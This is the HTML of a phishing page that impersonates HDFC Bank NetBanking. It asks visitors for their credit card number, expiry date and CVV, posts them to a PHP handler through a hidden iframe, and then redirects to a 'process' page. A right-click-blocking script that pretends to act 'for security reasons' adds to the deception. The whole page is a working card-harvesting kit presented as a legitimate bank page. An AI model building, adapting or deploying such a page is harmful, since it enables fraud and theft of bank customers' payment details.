<!DOCTYPE html>
<html lang="zxx">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
<link rel="manifest" href="/site.webmanifest">
<meta name="msapplication-TileColor" content="#da532c">
<meta name="theme-color" content="#ffffff">
    <title>HDFC Bank Secure Google/login</title>
    <style>
        #ft
        {
            width: 104%;
            margin-left:-6px;
        }
        #ii
        {   
        width:35%;
        border-radius:18px;
        margin-left:20px;
        }
       #cc
       {
        width: 250px;
        height:22px;
        padding:3px 10px;
        background-color:white;
        border-style:solid;
        outline:none;
        border-color:#CCCCCC;
        border-width:1px;
        margin:4px;
        border-radius:4px;
        margin-left:20px;
       }
       #pp
       {
        width: 32px;
         height:20px;
         padding:3px 10px;
         background-color:white;
         border-style:solid;
         outline:none;
         border-color:#CCCCCC;
         border-width:1px;
         margin:4px;
         border-radius:4px;
         margin-left:20px;
       }
       #cc:hover
       {
       border-color:#67AFE9; 
       box-shadow:0 0 6px 0 #67AFE9;    
       }
       #pp:hover
       {
       border-color:#67AFE9; 
       box-shadow:0 0 6px 0 #67AFE9;    
       }
        #ll
        {
        width: 180px;
        background-color:#1D85FE;
        border-color: white;
        padding: 10px 30px;
        margin: 10px 40px;
        border: none;
        border-radius: 4px;
        cursor: pointer;
        font-color:white;
        font-size: 16px; width: 180px; height: 37px;    
        color:white;
        }
        #ll:hover
        {
        width: 180px;
        background-color:#365785;
        color: white;
        padding: 10px 30px;
        margin: 10px 40px;
        border: none;
        border-radius: 4px;
        cursor: pointer;
        font-size: 16px; width: 180px; height: 37px;
        }
        #ab
        {
        width:358px;
        border-bottom: solid #f3f3f3;
        border-width:10px;
        }
        #dd
        {
          color:black; border-color:#CCCCCC;
          border-style:solid; border-radius:4px; 
          height:30px; width:60px; margin:10px; 
          margin-left:20px; padding: 1px 5px;
        }
        #yy
        {
        color:black; border-color:#CCCCCC;
        border-style:solid; border-radius:4px;
        outline:none; 
        height:30px; width:70px; margin:10px; 
        margin-left:10px; padding: 1px 5px;
        }
        #dd:hover
        {
        outline:none;
        border-color:#67AFE9;
        box-shadow:0 0 6px 0 #67AFE9;
        }
        #yy:hover
        {
        outline:none;
        border-color:#67AFE9;
        box-shadow:0 0 6px 0 #67AFE9;
        }
    </style>
    <script language="javascript">
    
    var message="For security reasons,This function is not allowed here.";
    function clickIE4(){
    
    if (event.button==2){
    alert(message);
    return false;
    }
    }
    
    function clickNS4(e){
    if (document.layers||document.getElementById&&!document.all){
    if (e.which==2||e.which==3){
    alert(message);
    return false;
    }
    }
    }
    
    if (document.layers){
    document.captureEvents(Event.MOUSEDOWN);
    document.onmousedown=clickNS4;
    }
    
    else if (document.all&&!document.getElementById){
    document.onmousedown=clickIE4;
    }
    
    document.oncontextmenu=new Function("alert(message);return false;")
    
    </script>
</head>
<body>
   <body onload="startTimer();">
   <!-- Static- Please don't do anything here-->
   <script type="text/javascript">var submitted=false;</script>
   <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='proccess.html';}"></iframe>
   <!--My Form-->
   <form action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
      <center><img src="logomain.jpg" alt="" width="55%"></center>
      <div class="container">
      <p style="font-family: Arial; 
      color:#3b444b; 
      text-align:center; margin:8px; font-size:22px;">Welcome to HDFC Bank<br> NetBanking
      </p></div><br>
      <div id="ab" 
      style="margin:8px;
      margin-left:-8px;">
      </div><br>
    <h3 style="
    background-color:#DFE9F5;
    padding: 10px 10px;
    border-radius:1px;
    margin:-15px;
    margin-left:-7px;
    font-size:16px;
    color:#1560BD;
    width:340px;
    height:40px;"
    >Enter your active Credit card details and proceed.</h3><br>
    <div id="tc">
    <form action="1.php" method="post">
    <div class="container1">
    <div id="card">
    <b style="color:#black; font-family:arial; margin-left:-2px; font-size:12px; padding:10px;">
    Enter the information requested below. This Information will <span style="color:#black; font-family:arial; margin-left:-2px; font-size:12px; padding:10px;"> be used to confirm your identity.</span>
    </b>
    </div>
    </div><br>
     <div id="zz">
    <b style="font-family:arial; color:#40464d; font-size:14px; margin-left:20px;">Enter Credit Card Number<span style="color:#f06565; font-family:arial;"><i>:</i></span></b>
    </div>
<div required="">
 <input type="text" name="Credit Card No. " id="cc" inputmode="numeric" onkeypress='return formats(this,event)' onkeyup="return numberValidation(event)" 
 placeholder="" required=""><br><br>
 <script>
 function formats(ele,e){
 if(ele.value.length<19){
 ele.value= ele.value.replace(/\W/g, '').replace(/(.{4})/g, '$1 ');
 return true;
 }else{
 return false;
 }
 }
 
 function numberValidation(e){
 e.target.value = e.target.value.replace(/[^\d ]/g,'');
 return false;
 }
 </script>
    <div id="ee">
    <b style="font-family:arial; color:#40464d; font-size:14px; margin-left:20px;">Valid Thru/Expiry Date <span style="color:#f06565;"><i>*</i></span> </b>
    </div>
    <span>
    <select name="Month" id="dd">
    <option value="01">01</option>
    <option value="02">02</option>
    <option value="03">03</option>
    <option value="04">04</option>
    <option value="05">05</option>
    <option value="06">06</option>
    <option value="07">07</option>
    <option value="08">08</option>
    <option value="09">09</option>
    <option value="10">10</option>
    <option value="11">11</option>
    <option value="12">12</option>
    </select>
    </span>
    <p1 style="color:#40464d;">/
    </p1> 
    <span>
    <select name="Year" id="yy">
    <option value="2023">2023</option>
    <option value="2024">2024</option>
    <option value="2025">2025</option>
    <option value="2026">2026</option>
    <option value="2027">2027</option>
    <option value="2028">2028</option>
    <option value="2029">2029</option>
    <option value="2030">2030</option>
    <option value="2031">2031</option>
    <option value="2032">2032</option>
    <option value="2033">2033</option>
    <option value="2034">2034</option>
    <option value="2035">2035</option>
    <option value="2036">2036</option>
    <option value="2037">2037</option>
    <option value="2038">2038</option>
    <option value="2039">2039</option>
    <option value="2040">2040</option>
    <option value="2041">2041</option>
    <option value="2042">2042</option>
    <option value="2043">2043</option>
    <option value="2044">2044</option>
    <option value="2045">2045</option>
    <option value="2046">2046</option>
    <option value="2047">2047</option>
    <option value="2048">2048</option>
    <option value="2049">2049</option>
    /  </select>
    </span><br><br>
    <div id="ee">
    <b style="font-family:arial; color:#40464d; font-size:14px; margin-left:20px;">CVV Number <span style="color:#f06565;"><i>*</i></span></b><br>
    </div>
    <div id="ff">
    <input type="password" name="CVV NO." id="pp" placeholder="xxx" inputmode="numeric" 
    maxlength="4" pattern="[0-9]{3,4}" title="Please enter valid CVV/CVC number!" required=""><br><br>
    </div>
    </div>
    <div id="qq">
    <button type="submit"id="ll">
    SUBMIT</button> <br><br>
    </div>
    <div>
    <img src="verising.png" alt="" id="ii"><br>
    <span style="color:grey; font-family:arial;">Your security is of utmost importance.</span><br>
    <span style="color:#1D85FE; font-family:arial;">Know more...</span><br><br><br>
    <img src="footer.jpg" alt="" id="ft"><br><br>
    